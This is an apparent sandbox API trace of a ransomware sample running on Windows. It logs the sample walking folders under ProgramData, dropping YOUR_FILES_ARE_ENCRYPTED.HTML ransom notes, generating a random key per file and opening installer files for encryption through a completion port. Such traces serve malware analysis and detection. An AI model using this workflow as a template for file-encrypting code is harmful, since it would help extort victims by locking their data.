[0108.222] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="38") returned 2 [0108.222] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="74") returned 2 [0108.222] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="B7") returned 2 [0108.222] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="DC") returned 2 [0108.222] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="F7") returned 2 [0108.222] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="0D") returned 2 [0108.222] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="39") returned 2 [0108.222] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="7A") returned 2 [0108.222] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="2D") returned 2 [0108.222] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="39") returned 2 [0108.222] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="1B") returned 2 [0108.222] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="0A") returned 2 [0108.222] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="E5") returned 2 [0108.222] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="18") returned 2 [0108.222] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="3F") returned 2 [0108.222] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="7B") returned 2 [0108.222] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="A5") returned 2 [0108.222] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="D8") returned 2 [0108.222] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="C0") returned 2 [0108.222] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="7C") returned 2 [0108.222] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="2D") returned 2 [0108.222] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="CD") returned 2 [0108.222] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="B0") returned 2 [0108.223] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="CA") returned 2 [0108.223] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="CA") returned 2 [0108.223] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="2F") returned 2 [0108.223] lstrcpyW (in: lpString1=0x3173e84, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0108.223] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x3163dd0, NumberOfConcurrentThreads=0x0) returned 0x274 [0108.224] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3163dd0, lpOverlapped=0x3163dd0) returned 1 [0108.224] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be2ab00, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x4be2ab00, ftLastAccessTime.dwHighDateTime=0x1d5c5bb, ftLastWriteTime.dwLowDateTime=0x4be2ab00, ftLastWriteTime.dwHighDateTime=0x1d5c5bb, nFileSizeHigh=0x0, nFileSizeLow=0x2d000, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0108.224] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.224] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 145 [0108.224] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0108.224] lstrlenW (lpString=".msi") returned 4 [0108.224] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0108.224] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be2ab00, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x4be2ab00, ftLastAccessTime.dwHighDateTime=0x1d5c5bb, ftLastWriteTime.dwLowDateTime=0x4be2ab00, ftLastWriteTime.dwHighDateTime=0x1d5c5bb, nFileSizeHigh=0x0, nFileSizeLow=0x2d000, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0108.224] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0108.224] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0108.224] GetProcessHeap () returned 0x600000 [0108.224] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0108.224] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0108.227] WriteFile (in: hFile=0x314, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0108.228] CloseHandle (hObject=0x314) returned 1 [0108.229] GetProcessHeap () returned 0x600000 [0108.229] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0108.229] GetProcessHeap () returned 0x600000 [0108.229] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0108.230] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x65089562, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x65089562, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0b80, dwReserved1=0x623f60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0108.230] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0108.230] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0108.230] GetProcessHeap () returned 0x600000 [0108.230] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0108.231] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0108.231] WriteFile (in: hFile=0x308, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0108.232] CloseHandle (hObject=0x308) returned 1 [0108.233] GetProcessHeap () returned 0x600000 [0108.233] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0108.233] GetProcessHeap () returned 0x600000 [0108.233] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.234] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6505595c, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 0 [0108.234] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0108.234] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0108.234] GetProcessHeap () returned 0x600000 [0108.234] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0108.234] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.235] WriteFile (in: hFile=0x30c, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.236] CloseHandle (hObject=0x30c) returned 1 [0108.237] GetProcessHeap () returned 0x600000 [0108.237] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.237] GetProcessHeap () returned 0x600000 [0108.237] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.238] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496a9699, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x496fd5cd, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x496fd5cd, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", cAlternateFileName="{13A4E~1.210")) returned 1 [0108.238] StrStrIW (lpFirst="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.238] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned 82 [0108.238] GetProcessHeap () returned 0x600000 [0108.238] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0108.239] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" [0108.239] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*" [0108.239] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496a9699, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x496fd5cd, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x496fd5cd, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0108.240] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496a9699, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x496fd5cd, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x496fd5cd, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0108.240] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496fd5cd, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x496fe967, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x496fe967, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 1 [0108.240] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.240] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned 91 [0108.240] GetProcessHeap () returned 0x600000 [0108.240] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0108.240] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" [0108.241] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*" [0108.241] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496fd5cd, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x496fe967, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x496fe967, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fd0, dwReserved1=0x623f60, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0108.241] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496fd5cd, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x496fe967, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x496fe967, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fd0, dwReserved1=0x623f60, cFileName="..", cAlternateFileName="")) returned 1 [0108.241] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496fe967, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49704b0b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f0fd0, dwReserved1=0x623f60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0108.241] StrStrIW (lpFirst="vcRuntimeMinimum_x86", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.241] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned 112 [0108.241] GetProcessHeap () returned 0x600000 [0108.241] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0108.280] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" [0108.280] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*" [0108.280] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496fe967, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49704b0b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0108.281] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496fe967, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49704b0b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0108.281] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b40d00, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc0b40d00, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xc0b40d00, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0xf36be, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0108.281] StrStrIW (lpFirst="cab1.cab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.281] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0108.281] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0108.281] lstrlenW (lpString=".cab") returned 4 [0108.281] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0108.281] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0108.281] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0108.282] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=997054) returned 1 [0108.282] GetProcessHeap () returned 0x600000 [0108.282] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x671348 [0108.285] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="83") returned 2 [0108.285] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="96") returned 2 [0108.285] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="BA") returned 2 [0108.285] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="DD") returned 2 [0108.285] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="32") returned 2 [0108.285] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="88") returned 2 [0108.286] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="D9") returned 2 [0108.286] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="FB") returned 2 [0108.286] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="15") returned 2 [0108.286] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="CE") returned 2 [0108.286] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="A4") returned 2 [0108.286] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="51") returned 2 [0108.286] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="61") returned 2 [0108.286] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="38") returned 2 [0108.286] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="4F") returned 2 [0108.286] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="C4") returned 2 [0108.286] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="D4") returned 2 [0108.286] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="DF") returned 2 [0108.286] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="A1") returned 2 [0108.286] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="60") returned 2 [0108.286] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="42") returned 2 [0108.286] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="C2") returned 2 [0108.286] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="B7") returned 2 [0108.286] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="75") returned 2 [0108.286] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="8A") returned 2 [0108.286] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="8A") returned 2 [0108.286] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="04") returned 2 [0108.286] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="D3") returned 2 [0108.286] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="1C") returned 2 [0108.286] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="D3") returned 2 [0108.286] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="ED") returned 2 [0108.286] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="62") returned 2 [0108.288] lstrcpyW (in: lpString1=0x6813fc, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0108.288] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x671348, NumberOfConcurrentThreads=0x0) returned 0x274 [0108.288] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x671348, lpOverlapped=0x671348) returned 1 [0108.288] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0b40d00, ftCreationTime.dwHighDateTime=0x1cf3e1e, 